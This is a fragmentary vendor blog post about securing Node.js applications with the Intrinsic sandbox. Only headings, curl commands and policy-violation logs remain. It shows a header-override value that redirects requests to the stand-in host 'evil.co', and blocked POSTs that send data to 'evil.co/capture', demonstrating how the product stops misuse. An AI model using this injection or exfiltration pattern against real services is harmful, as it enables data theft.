Securing Node.js Applications with Intrinsic

Thomas Hunter II
Oct 1, 2018 · 6 min read
X-BlueGreen-Host-Override: user=user2.example.org
X-BlueGreen-Host-Override: user=evil.co

Anticipating Application I/O

Configuring Intrinsic

"@intrinsic/intrinsic": "./intrinsic-intrinsic-2.4.13.tgz"

Protecting against Developer Mistakes

curl http://localhost:8000/retrieve-data \
-H "X-BlueGreen-Host-Override: user2.example.org"
curl http://localhost:8000/retrieve-data \
-H "X-BlueGreen-Host-Override: evil.co"
[INTRINSIC] OutboundHttpPolicyViolation: POLICY_VIOLATION
sb: "/retrieve-data-[[POST]]" |
[POST] http://evil.co/data-from-third-party not in outbound http whitelist

Protecting against Malicious Modules

[INTRINSIC] OutboundHttpPolicyViolation: POLICY_VIOLATION
sb: "/retrieve-data-[[POST]]" |
[POST] http://evil.co/capture not in outbound http whitelist

What does Intrinsic Protect?

Request a Demo of Intrinsic


intrinsic

Learn more about everything from deep dives to tutorials on security principles and technologies we love. https://intrinsic.com

Thomas Hunter II

Written by

intrinsic

intrinsic

Learn more about everything from deep dives to tutorials on security principles and technologies we love. https://intrinsic.com